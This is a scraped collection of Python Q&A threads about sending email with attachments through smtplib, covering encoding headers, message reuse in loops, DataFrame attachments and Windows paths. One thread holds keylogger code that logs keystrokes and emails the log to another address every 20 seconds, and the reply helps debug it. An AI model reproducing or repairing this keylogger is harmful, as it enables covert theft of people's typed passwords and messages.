How to set the Content-Transfer-Encoding in python - python-3.x

Some users are having the content transfer encoding type set as base64. How do I set the Content-Transfer-Encoding manually.
import smtplib
from email.message import EmailMessage
from email.encoders import encode_7or8bit
msg = EmailMessage()
msg.set_content(message,subtype='html')
#msg.set_charset('UTF-8')
msg['Subject'] ="your order is {} at {}".format(order_id,today_is)
msg['From'] = 'email#gmail.com'
msg['To'] = 'toemail#gmail.com'
encode_7or8bit(msg)
This is the error I am getting.
ValueError: There may be at most 1 Content-Transfer-Encoding headers in a message
If I move encode_7or8bit(msg) above msg.set_content it works, but I don't think the content is being set. Should I send something into set_content

import smtplib
from email.message import EmailMessage
msg = EmailMessage()
msg.set_content(message,subtype='html',charset='utf-8',cte='7bit')
msg['Subject'] ="your order is {} at {}".format(order_id,today_is)
msg['From'] = 'email#gmail.com'
msg['To'] = 'toemail#gmail.com'
On msg.set_content() I have to send in the cte.
Python 3 Email Content Encoding Types

Related

Problem with sendmail(email, send_to_email, msg.as_string())

I'm trying to attach and send multiple attachments to list of emails individually
import smtplib
import openpyxl
import os.path
from email import encoders
from openpyxl import load_workbook
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email.mime.multipart import MIMEMultipart
email_source_workbook = load_workbook(filename=r'C:\Users\Name\Desktop\final mailer\mail list.xlsx')
curr_sheet = email_source_workbook['ml']
attachment_location = [r'C:\Users\Name\Desktop\final mailer\at1.txt']
row_len = curr_sheet.max_row
email = 'example#email.com'
password = 'pswrd'
subject = 'test subj' #Subject
message = '''this
is test
mail
ok?
'''
msg = MIMEMultipart()
with smtplib.SMTP('smtp-mail.outlook.com', 587) as svr:
print("Initializing the server")
svr.ehlo()
svr.starttls()
svr.ehlo()
svr.login(email, password)
print("login sucessful")
for curr_attachment in attachment_location:
name_of_attachment = os.path.basename(curr_attachment)
attachment_payload = MIMEBase('application' , "octet-stream")
attachment_payload.set_payload(open(curr_attachment, "rb").read())
encoders.encode_base64(attachment_payload)
attachment_payload.add_header('Content-Disposition', 'attachment' , filename=name_of_attachment)
for i in range(1 , row_len+1):
print("###################")
send_to_email = curr_sheet.cell(row = i, column = 1).value
msg['From'] = email
msg['To'] = send_to_email
msg['Subject'] = subject
msg.attach(MIMEText(message, 'plain'))
svr.sendmail(email, send_to_email, msg.as_string())
svr.quit()
i can send the mail but the problem is for example there are 3 email addresses in the excel file
it will send the first mail to the first recipient
perfectly fine
then in the second mail it'll send it to the second and first recipient with the attachment + the wole body of mail as one more attachment
and to the third it will send to the first two recipients with the third with the original attachment with two same attachments that are the body of the mail. it will go on so fourth with n number of email addresses. i.e. 10 mail id and on the 10th mail the 10th recipient with all the previous 9 and 10 attachments.
found the solution
msg = MIMEMultipart()
should be in
for i in range(1 , row_len+1):
print("###################")
send_to_email = curr_sheet.cell(row = i, column = 1).value
msg['From'] = email
msg['To'] = send_to_email
msg['Subject'] = subject
msg = MIMEMultipart()
msg.attach(MIMEText(message, 'plain'))
svr.sendmail(email, send_to_email, msg.as_string())

Why is Python Keylogger not working properly?

I want to create a keylogger that is going to send the file to mail every x second.
import time
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email import encoders
from pynput.keyboard import Key, Listener
import logging
log_dir = ''
logging.basicConfig(filename=(log_dir + "Document.txt"),
level=logging.DEBUG, format='%(asctime)s: %(message)s')
def on_press(key):
logging.info(str(key))
with Listener(on_press=on_press) as Listener:
Listener.join()
mail_send()
def mail_send():
email_user = 'my mail'
email_password = 'my pass'
email_send = 'another mail'
subject = 'subject'
msg = MIMEMultipart()
msg['From'] = email_user
msg['To'] = email_send
msg['Subject'] = subject
body = 'Hi there, sending some stuff!'
msg.attach(MIMEText(body, 'plain'))
filename = 'Document.txt'
attachment = open(filename, 'rb')
part = MIMEBase('application', 'octet-stream')
part.set_payload((attachment).read())
encoders.encode_base64(part)
part.add_header('Content-Disposition', "attachment; filename= "+filename)
msg.attach(part)
text = msg.as_string()
server = smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()
server.login(email_user, email_password)
server.sendmail(email_user, email_send, text)
server.quit()
time.sleep(20)
mail_send()
Code was working well before I added the "keylogging part"
It's probably not working because the file is being edited by keylogger so I would like to know how to fix it.
(my eng is bad sry)
Thanks for any tip
What's the error message you're getting, if any?
From the code you've given, I can see two problems.
First is that you've called mail_send() before defining it, and second that while you are opening the file via open(), you're not closing it. You should look up context manager to not have to deal with these issues of closing files/signing out etc.

How to send Pandas DataFrame as an attachment in Pandas

I have searched around SO and Google a lot but did not get my answer hence ultimately thought to ask here.
I have a csv file, which I'm converting to an html frame which works fine and I can send that as an html frame via Outlook as an email.
Was looking if we can directly send df.to_html as an attachment to the e-mail ?
Below is the code:
This works fine sending as an e-mail with html frame via Outlook.
import pandas as pd
import numpy as np
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
df = pd.read_csv('graph.csv', names=['Volume_Path', 'Last Acced', 'Year', 'Month', 'Days', '1-24 hrs', '1 hour', '15 mins', 'future'])
df['Volume_Path'] = df['Volume_Path'].str.replace('\t', '')
df = df.replace(np.nan, '')
# Create message container - the correct MIME type is multipart/alternative.
##############################################################################
msg = "<u><b> Checklist</b></u><br />"
msg = msg + "<br />"
msg += df.to_html(escape=False)
def mail(msg,recipients,key):
try:
s = smtplib.SMTP('mailserver.xyz.com')
msg1 = MIMEText(msg, 'html')
sender = 'tina#xyz.com'
msg1['From'] = sender
msg1['To'] = ", ".join(recipients)
msg1['Cc'] = 'mauj#xyz.com'
msg1['Subject'] = "Mauj Test"
s.sendmail(sender, recipients, msg1.as_string())
print(f"Mail Sent to {sender}")
except Exception as error:
print(f"Mail Failed - {error}")
recipients = ['joe#xyz.com']
key=""
mail(msg,recipients,key)
If you don't want to save the pandas.DataFrame as an html file on your drive but rather attach it directly I would use MIMEBase and attach it to your message
Here html_object is the df.to_html() object.
import smtplib
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
def mail(body,recipients,key, html_object):
s = smtplib.SMTP('server.com')
msg = MIMEMultipart()
msg.attach(MIMEText(body))
part = MIMEBase('text', "html")
part.set_payload(html_object)
part.add_header('Content-Disposition', 'attachment; filename="tbl.html"')
msg.attach(part)
sender = 'me#place.com'
msg['From'] = sender
msg['To'] = ", ".join(recipients)
msg['Subject'] = "Html Test"
s.sendmail(sender, recipients, msg.as_string())
print(f"Mail Sent to {sender}")
e.g.
mail('See attached for html file.',["me#place.com"],key="", html_object=df.to_html())

error when sending email in python: 'bytes' object has no attribute 'encode'

I need to send out an email in python3, below is the script and it failed with an error of:
'bytes' object has no attribute 'encode'
import smtplib
from email.mime.text import MIMEText
from email.message import EmailMessage
att1 = [u'201902260920AM.log']
msg = MIMEText("EmailOperator testing email.")
msg['Subject'] = "EmailOperator testing email."
msg['From'] = "Airflow_Notification_No_Reply#company.Com"
msg['To'] = "pasle#company.com"
msg['files'] = str(att1).encode("UTF-8")
s = smtplib.SMTP('localhost')
s.send_message(msg)
s.quit()
What's the right way to send out an email with attachment?
Much appreciated if anyone can enlighten me here, thank you in advance.
UPDATE1: you can run the above code in python3 and you will receive the error
UPDATE2: Indeed the actual log files I want to attach would be something like this:
'/home/pasle/airflow/logs/pipeline_client1/send_email/2019-02-27T01:40:38.451894+00:00/1.log'
and I need to send emails with multiple attachments, thank you for your help.
att1 = [u'201902260920AM.log']
msg = MIMEText("EmailOperator testing email.")
msg['Subject'] = "EmailOperator testing email."
msg['From'] = "Airflow_Notification_No_Reply#novantas.Com"
msg['To'] = "rxie#novantas.com"
msg['files'] = att1[0].encode("utf-8")
s = smtplib.SMTP('localhost')
s.send_message(msg)
s.quit()
It should probably work.
The fact you are using [u'ABC'] would be a one-element list of Unicode strings.
So you need to convert the list to a single Unicode string, and then convert that to utf-8.
UPDATE:
import smtplib
from os.path import basename
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
files = ['/home/pasle/airflow/logs/pipeline_client1/send_email/2019-02-27T01:40:38.451894+00:00/1.log',
'/home/pasle/airflow/logs/pipeline_client1/send_email/2019-02-27T01:40:38.451894+00:00/2.log']
msg = MIMEMultipart()
msg['From'] = 'Airflow_Notification_No_Reply#novantas.com'
msg['To'] = 'rxie#novantas.com'
msg['Subject'] = 'Email operator testing email.'
message = MIMEText('Email operator testing email body text.')
msg.attach(message)
for f in files:
with open(f, "rb") as file:
part = MIMEApplication(
file.read(),
Name=basename(f)
)
# After the file is closed
part['Content-Disposition'] = 'attachment; filename="%s"' % basename(f)
msg.attach(part)
gmail_sender = 'sender#gmail.com'
gmail_passwd = 'password'
server = smtplib.SMTP_SSL('smtp.gmail.com', 465)
server.login(gmail_sender, gmail_passwd)
server.send_message(msg)
server.quit()
As I looked into your problem Attribute Error was occurring due to not declaring msg as a MIMEMultipart() method.

windows file directory path in Python

Can anyone please help me, I'm a newbie, I have a bit of code which I'm working on and I'm struggling with the file directory path. I have found other examples and tried them as shown below. The Python code is to email out a file called 'myfile.txt' form the folder 'F:\D\OneDrive\Python\Spyder\test'.
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
#sender's address
fromaddr = "username#gmail.com"
#receiptent's email address
toaddr = "username2#gmail.com"
msg = MIMEMultipart()
msg['From'] = fromaddr
msg['To'] = toaddr
msg['Subject'] = "Python test"
body = "Did it work Sam?"
msg.attach(MIMEText(body, 'plain'))
filename = "myfile.txt"
attachment = open("F:\D\OneDrive\Python\Spyder\test", "rb")
part = MIMEBase('application', 'octet-stream')
part.set_payload((attachment).read())
encoders.encode_base64(part)
part.add_header('Content-Disposition', "attachment; filename= %s" % filename)
msg.attach(part)
server = smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()
server.login(fromaddr, "password")
text = msg.as_string()
server.sendmail(fromaddr, toaddr, text)
server.quit()
And I get this error -
PermissionError: [Errno 13] Permission denied:
b'F:\\D\\OneDrive\\Python\\Spyder\\test'
If I change the line to -
attachment = open("F:\D\OneDrive\Python\Spyder\test\", "rb")
I get -
attachment = open("F:\D\OneDrive\Python\Spyder\test\", "rb")
^
SyntaxError: EOL while scanning string literal
If I change the line to -
attachment = open("F:\\D\\OneDrive\\Python\\Spyder\\test\\", "rb")
I get -
attachment = open("F:\\D\\OneDrive\\Python\\Spyder\\test\\", "rb")
FileNotFoundError: [Errno 2] No such file or directory:
'F:\\D\\OneDrive\\Python\\Spyder\\test\\'
If you work in Windows you must use windows path format. Method open with 'rb' parameters read file in byte mode if file is exist. You try read the directory!?
attachment = open('F:\\D\\OneDrive\\Python\\Spyder\\test\\myfile.txt", "rb")
equal
attachment = open(r'F:\D\OneDrive\Python\Spyder\test\myfile.txt', 'rb')
This represents the path correctly, but fails to provide a file name, because the trailing \ means a directory.
attachment = open("F:\\D\\OneDrive\\Python\\Spyder\\test\\myfile.txt", "rb")
What you likely want is
# Note the r and the lack of a trailing slash.
attachment = open(r"F:\D\OneDrive\Python\Spyder\test\myfile.txt", "rb")
I have found different code here and this works. Still can't work out why the original code does not work -
python program to rename the file with current date in MMDDYYY format and send email with attachment
Fixed code -
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
fromaddr = "username#gmail.com"
toaddr = "username2#gmail.com"
msg = MIMEMultipart()
msg['From'] = fromaddr
msg['To'] = toaddr
msg['Subject'] = "Please find the attachment"
body = "HI"
msg.attach(MIMEText(body, 'plain'))
filename = "myfile.txt"
#dt = str(datetime.datetime.now())
attachment = open("F:\\D\\OneDrive\\Python\\Spyder\\myfile.txt", "rb")
part = MIMEBase('application', 'octet-stream')
part.set_payload((attachment).read())
encoders.encode_base64(part)
part.add_header('Content-Disposition', "attachment; filename= %s" % filename)
msg.attach(part)
server = smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()
server.login(fromaddr, "password")
text = msg.as_string()
server.sendmail(fromaddr, toaddr, text)
server.quit()

Resources